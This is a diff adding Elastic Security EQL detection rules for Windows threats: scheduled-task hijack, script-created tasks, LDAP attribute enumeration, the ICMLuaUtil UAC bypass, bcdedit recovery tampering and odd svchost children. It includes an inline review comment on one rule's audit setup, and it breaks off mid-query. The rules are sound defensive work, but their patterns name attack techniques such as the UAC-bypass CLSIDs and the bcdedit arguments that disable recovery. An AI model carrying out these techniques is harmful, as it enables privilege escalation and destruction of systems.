@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via TelemetryController Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", + "references": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline 
refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "68921d85-d0dc-48b3-865f-43291ca2c4f2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json new file mode 100644 index 00000000000..8b1eaa30cb4 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json 
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Task Created by a Windows Script", + "note": "## Triage and analysis\n\nDecode the base64 encoded Tasks Actions registry value to investigate the task's configured action.", + "query": "sequence by host.id with maxspan = 30s\n [any where host.os.type == \"windows\" and \n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "689b9d57-e4d5-4357-ad17-9c334609d79a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "689b9d57-e4d5-4357-ad17-9c334609d79a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json b/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json new file mode 100644 index 00000000000..77bdab05d76 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify read access to a high number of Active Directory object attributes. The knowledge of objects properties can help adversaries find vulnerabilities, elevate privileges or collect sensitive information.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Access to LDAP Attributes", + "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n winlog.event_data.AccessMaskDescription == \"Read Property\" and length(winlog.event_data.Properties) >= 2000\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMaskDescription", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68ad737b-f90a-4fe5-bda6-a68fa460044e", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: System", + "Data 
Source: Active Directory", + "Data Source: Windows" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "68ad737b-f90a-4fe5-bda6-a68fa460044e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json new file mode 100644 index 00000000000..316c3f70108 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json 
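Review bot: The `setup` text in this new rule tells operators to enable the "Audit Directory Service Changes" subcategory, but the query keys on `event.code == "4662"`, which to my recollection is produced by the sibling "Audit Directory Service Access" subcategory (Directory Service Changes yields the 5136/5137/5141 family), so a deployment that follows the setup literally would likely never generate the event this rule needs. I would change the first setup sentence to `The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).` and the final step to `Audit Directory Service Access (Success,Failure)`, after confirming against the Windows advanced audit policy reference. The `length(winlog.event_data.Properties) >= 2000` threshold and the `S-1-5-18` exclusion are not explained anywhere in the rule; a `false_positives` entry and a `note` with triage steps (what the Properties GUID list represents, which service or monitoring accounts are expected to read many attributes, how to raise the threshold per environment) would help tuning, since 4662 volume under this audit policy is typically high.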
@@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": 
"high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "68d56fdc-7ffa-4419-8e95-81641bd6f845_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json new file mode 100644 index 00000000000..143019d3fc7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json 
@@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + 
"severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "68d56fdc-7ffa-4419-8e95-81641bd6f845_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json new file mode 100644 index 00000000000..d1deb033cbb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of Boot Configuration", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options. These are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to configure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. 
Administrators can modify these configurations to force a machine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "69c251fb-a5d6-4035-b5ec-40438bd829ff_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json new file mode 100644 index 00000000000..f6668dd5558 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of Boot Configuration", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options. These are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to configure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. 
Administrators can modify these configurations to force a machine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "69c251fb-a5d6-4035-b5ec-40438bd829ff_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json new file mode 100644 index 00000000000..c3ef65eb970 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation.", + "false_positives": [ + "Changes to Windows services or a rarely executed child process." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Service Host Child Process - Childless Service", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n process.parent.args : (\n \"WdiSystemHost\", \"LicenseManager\", \"StorSvc\", \"CDPSvc\", \"cdbhsvc\", \"BthAvctpSvc\", \"SstpSvc\", \"WdiServiceHost\",\n \"imgsvc\", \"TrkWks\", \"WpnService\", \"IKEEXT\", \"PolicyAgent\", \"CryptSvc\", \"netprofm\", \"ProfSvc\", \"StateRepository\",\n \"camsvc\", \"LanmanWorkstation\", \"NlaSvc\", \"EventLog\", \"hidserv\", \"DisplayEnhancementService\", \"ShellHWDetection\",\n \"AppHostSvc\", \"fhsvc\", \"CscService\", \"PushToInstall\"\n ) and\n\n /* unknown FPs can be added here */\n not process.name : (\"WerFault.exe\", \"WerFaultSecure.exe\", \"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (\n process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and\n process.parent.args : \"WdiServiceHost\"\n ) and\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n 